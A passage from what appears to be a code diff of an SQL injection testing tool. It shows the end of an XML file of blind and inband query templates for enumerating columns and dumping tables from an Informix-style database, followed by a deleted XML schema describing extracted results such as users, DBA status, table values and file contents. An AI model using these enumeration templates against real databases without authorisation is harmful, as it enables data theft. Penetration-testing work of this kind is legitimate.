<blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s:%s"/>
<blind query="SELECT SKIP %d LIMIT 1 %s FROM %s:%s ORDER BY %s" count="SELECT COUNT(*) FROM %s:%s"/>
</dump_table>
<search_db/>
<search_table/>
<search_column/>
</dbms>
</root> </root>

View File

@@ -1,284 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="Results">
<xs:complexType>
<xs:all>
<xs:element ref="Messages" minOccurs="0" />
<xs:element ref="Banner" minOccurs="0"/>
<xs:element ref="CurrentUser" minOccurs="0"/>
<xs:element ref="CurrentDB" minOccurs="0"/>
<xs:element ref="isDBA" minOccurs="0"/>
<xs:element ref="Users" minOccurs="0"/>
<xs:element ref="UserSettings" minOccurs="0"/>
<xs:element ref="DBs" minOccurs="0"/>
<xs:element ref="DBTables" minOccurs="0"/>
<xs:element ref="Technics" minOccurs="0" />
<xs:element ref="Lists" minOccurs="0" />
<xs:element ref="DatabaseColumns" minOccurs="0" />
<xs:element ref="DBValues" minOccurs="0"/>
<xs:element ref="Queries" minOccurs="0"/>
<xs:element ref="RegistryEntries" minOccurs="0"/>
<xs:element ref="FileContent" minOccurs="0"/>
<xs:element ref="Status"/>
</xs:all>
</xs:complexType>
</xs:element>
<!-- Simple Types -->
<xs:element name="Banner" type="xs:string"/>
<xs:element name="CurrentUser" type="xs:string"/>
<xs:element name="CurrentDB" type="xs:string"/>
<!-- File Content -->
<xs:element name="FileContent">
<xs:complexType mixed="true">
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- RegistryEntries -->
<xs:element name="RegistryEntries">
<xs:complexType>
<xs:sequence>
<xs:element ref="RegisterData" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="RegisterData" type="xs:string"/>
<!-- Queries -->
<xs:element name="Queries">
<xs:complexType>
<xs:sequence>
<xs:element ref="Query" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Query">
<xs:complexType mixed="true">
<xs:attribute name="value" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Columns -->
<xs:element name="DatabaseColumns">
<xs:complexType>
<xs:sequence>
<xs:element ref="DB" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DB">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Table" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Table">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Column" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Column">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- List -->
<xs:element name="Member">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="List">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Lists">
<xs:complexType>
<xs:sequence>
<xs:element ref="List" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<!-- Technics -->
<xs:element name="Technics">
<xs:complexType>
<xs:sequence>
<xs:element ref="Technic" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Technic">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Messages -->
<xs:element name="Messages">
<xs:complexType>
<xs:sequence>
<xs:element ref="Message" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Message">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- is DBA -->
<xs:element name="isDBA">
<xs:complexType>
<xs:attribute name="value" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Users -->
<xs:element name="Users">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBUser"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBUser" type="xs:string"/>
<!-- User Settings -->
<xs:element name="UserSettings">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="UserSetting"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="UserSetting">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="User"/>
</xs:sequence>
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<xs:element name="User">
<xs:complexType>
<xs:sequence>
<xs:element ref="Settings" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Settings">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<!-- Databases -->
<xs:element name="DBs">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBName"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBName" type="xs:NCName"/>
<!-- DB Tables -->
<xs:element name="DBTables">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Database"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Database">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBTable"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="DBTable" type="xs:NCName"/>
<!-- Table Values -->
<xs:element name="DBValues">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" ref="DBTableValues"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBTableValues">
<xs:complexType>
<xs:sequence>
<xs:element ref="Row" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="db" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Row">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Cell"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Cell">
<xs:complexType mixed="true">
<xs:attribute name="column" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Status Elements -->
<xs:element name="Status">
<xs:complexType>
<xs:sequence>
<xs:element ref="Error" minOccurs="0"/>
</xs:sequence>
<xs:attribute name="success" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Error">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
</xs:schema>